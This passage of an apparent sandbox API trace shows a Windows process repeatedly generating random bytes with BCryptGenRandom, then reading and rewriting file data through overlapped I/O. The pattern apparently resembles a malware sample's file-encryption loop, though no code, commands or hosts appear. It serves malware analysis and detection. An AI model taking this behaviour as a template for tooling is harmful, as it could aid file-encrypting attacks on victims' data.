[0197.348] free (_Block=0x1fa2ed8) [0197.348] free (_Block=0x1fa90b8) [0197.348] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.349] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.375] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1aa2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.376] CloseHandle (hObject=0x170) returned 1 [0197.376] free (_Block=0x3df0008) [0197.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.392] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.392] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.392] free (_Block=0x3e305b8) [0197.392] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.392] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.392] free (_Block=0x1fa91d0) [0197.392] free (_Block=0x1fa2ed8) [0197.392] free (_Block=0x1fa90b8) [0197.392] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.393] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.405] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1232, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.420] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.421] CloseHandle (hObject=0x170) returned 1 [0197.421] free (_Block=0x3df0008) [0197.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.429] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.430] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.430] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.431] free (_Block=0x3e305b8) [0197.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.431] free (_Block=0x1fa91d0) [0197.431] free (_Block=0x1fa2ed8) [0197.431] free (_Block=0x1fa90b8) [0197.431] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.432] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.456] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xed0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.457] CloseHandle (hObject=0x170) returned 1 [0197.457] free (_Block=0x3df0008) [0197.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.467] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.467] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.467] free (_Block=0x3e305b8) [0197.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.467] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.468] free (_Block=0x1fa91d0) [0197.468] free (_Block=0x1fa2ed8) [0197.468] free (_Block=0x1fa90b8) [0197.468] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.468] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.472] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.473] CloseHandle (hObject=0x170) returned 1 [0197.474] free (_Block=0x3df0008) [0197.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.483] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.484] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.484] free (_Block=0x3e305b8) [0197.484] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.484] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.485] free (_Block=0x1fa91d0) [0197.485] free (_Block=0x1fa2ed8) [0197.485] free (_Block=0x1fa90b8) [0197.485] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.487] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.488] CloseHandle (hObject=0x170) returned 1 [0197.488] free (_Block=0x3df0008) [0197.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.496] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.496] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.497] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.497] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.497] free (_Block=0x3e305b8) [0197.497] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.497] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.497] free (_Block=0x1fa91d0) [0197.497] free (_Block=0x1fa2ed8) [0197.497] free (_Block=0x1fa90b8) [0197.497] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.499] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x62f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.499] CloseHandle (hObject=0x170) returned 1 [0197.500] free (_Block=0x3df0008) [0197.500] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.509] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.510] free (_Block=0x3e305b8) [0197.510] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.510] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.510] free (_Block=0x1fa91d0) [0197.510] free (_Block=0x1fa2ed8) [0197.510] free (_Block=0x1fa90b8) [0197.510] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.512] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.512] CloseHandle (hObject=0x170) returned 1 [0197.513] free (_Block=0x3df0008) [0197.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.522] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.522] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.522] free (_Block=0x3e305b8) [0197.522] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.522] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.523] free (_Block=0x1fa91d0) [0197.523] free (_Block=0x1fa2ed8) [0197.523] free (_Block=0x1fa90b8) [0197.523] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.523] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.524] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.536] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2448, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.537] CloseHandle (hObject=0x170) returned 1 [0197.537] free (_Block=0x3df0008) [0197.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.547] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.547] free (_Block=0x3e305b8) [0197.547] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.547] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.547] free (_Block=0x1fa91d0) [0197.547] free (_Block=0x1fa2ed8) [0197.547] free (_Block=0x1fa90b8) [0197.547] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.549] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.560] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x958c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.561] CloseHandle (hObject=0x170) returned 1 [0197.561] free (_Block=0x3df0008) [0197.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.705] BCryptGenRandom (in: hAlgorithm=0x0, 